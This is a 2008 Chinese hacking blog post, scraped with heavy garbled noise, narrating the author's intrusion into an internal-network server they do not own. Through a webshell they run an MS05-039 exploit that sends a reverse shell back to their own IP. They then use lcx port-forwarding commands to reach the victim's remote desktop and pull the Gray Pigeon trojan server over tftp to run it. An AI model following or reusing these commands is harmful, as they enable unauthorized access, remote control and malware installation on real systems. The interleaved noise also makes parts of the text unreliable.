MS05-039+lcx=内网服务器

上一篇 / 下一篇  2008-09-12 07:39:45

最近一直为了拿不到服务器而郁闷。自己菜!
6})e R&U aC,? Jf0上次拿到过两个都是下载pcanywhere里面的cif文件然后用pcanywhere连的。
.A'q*d7?JV7Y0]4O0
4^pH4[ h]0看了邪恶的原创贴>MS05-039××,然后就学会了。
$i6S^-W.p!Ee,C0就马上去Webshell里面测试下。IXPUB技术博客ein nT

6vj|7k1R3?Q6_0首先把Ms05039漏洞利用程序传上去。
3iN&iC)k0Wf0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客7Y_6C{A0s
IXPUB技术博客3{`n a3h~o&V.J)P O%r
然后选择Wscriptshell程序运算器。点击Wscriptshell
1dO4\,l&N i8M4Ce0然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口)
,d!|D4dYw(F0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客6w)n:{5E"Nb2_
在本地监听2105端口
MUp{/k0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客k Ag`v RFg
点击运行IXPUB技术博客-jN1I4t+}
IXPUB技术博客7A'JB ^#ypL n
终于反弹成功(看图)
%TC.Z6n x)s,|7B%Ox0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客 dn;w g)?3w_
IXPUB技术博客5v&\Ro-qEC
别高兴太早了。BT了吧,内网服务器。。。郁闷吧
L Y?`a0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
Q2b-rf6[C0mV)J0
g m,MG8FH^8igM0也别泄气啊,这不,我早就把把lcx传到webshell上去了。
h:F] KEbrBkn0××:“lcx是啥啊?IXPUB技术博客&F"KD8J3usF#X
晕,你连xingxuexin老大的动画都不看,咋混啊?IXPUB技术博客+D^(]Koej5j
第八课里面讲得够仔细了。。。
d7nx H%pC)RaEkP/q0先在本地监听51转8899 lcx -listen 51 8899IXPUB技术博客%?4c0_d-i'F,c+i+xl
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
+L7]%h7\U&dS5?0。××:"为啥是8899啊?"它的远程终端是8899哦
HOZt-g&C'W7VD0IXPUB技术博客xmz#B]
然后到在cmdshell下面运行lcx -slave 219.144.177.19 51  172.16.2.10 8899IXPUB技术博客!S2q"ZD%s1Ptn$uM
这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。
GWtj&l,[9_!J0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
jt:KMlh8l!Yi%Uj0
`Wh s!}0然后敲击回车,打开MSTSC.EXE连接本机8899端口。IXPUB技术博客r h ?'Y-~"z
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
7UvD _2[D$`)[0`*O;a0
n*\d mUDM&p)s0看到没有连接上了
-L"^&w(}/Q n0screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客T|F8k,G8Z0t
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>
Uy(KcUMg7J0IXPUB技术博客$grH;N}$R3]3y
由于服务器是网通的,还是内网的,汗×IXPUB技术博客{j4F9m BfK%ar c
所以远程桌面卡得很
(py*Kr ]| x?^.C0本来架设ftp呢!连接后假死状态。然后经过xingxuexin老大的执教,
YZ(h{x9zq0就架设了tftpIXPUB技术博客0]:P+Ig B4Z'}5p$J
然后在cmdshell下面运行tftp -i 我的IP get 灰鸽子服务端.exe
2l;^7X$c&v|ygz[0等了半个小时吧,服务端传完了。
S^~+nI,ST8[|0然后运行了..............IXPUB技术博客'l{Tb.R

}EFs}E"G iR0然后老大吩咐我做动画,乖乖我的CPU1.7内网256,估计整不了啊。
e$gN9wZ0准备做动画的突然发现ms05039反弹不了了。IXPUB技术博客$}(Q0Jc9VL
[+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED
v&bs%^-p J^0[+] Making null session...IXPUB技术博客 P$X3GT4k1q[m)A T
[!] Failed to get responding data
w:d~8B9@C0不知道为啥?IXPUB技术博客 x2BF1a/g6G%W
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0>IXPUB技术博客W+D`(T7H-}2n

s.X!G^&P]J&c0郁闷啊,后来发现管理员没在啊,应该。郁闷ingIXPUB技术博客u(K tf(`-le-i
Click here to open new windowscreen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" border=0 resized="true">IXPUB技术博客-Hr.Z0P8z A
IXPUB技术博客6d0eNo$|3_iD
这次拿服务器算是完成篇吧
$@,x)uo!j*p5J9i0很简单的,没什么技术的,应该一看就会了。吧。。。IXPUB技术博客O+E.uV Too&mP

qlL3X(B/LI0就到这里了。。。。希望大家技术>Beter and Beter

TAG: lcx 服务器 内网

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar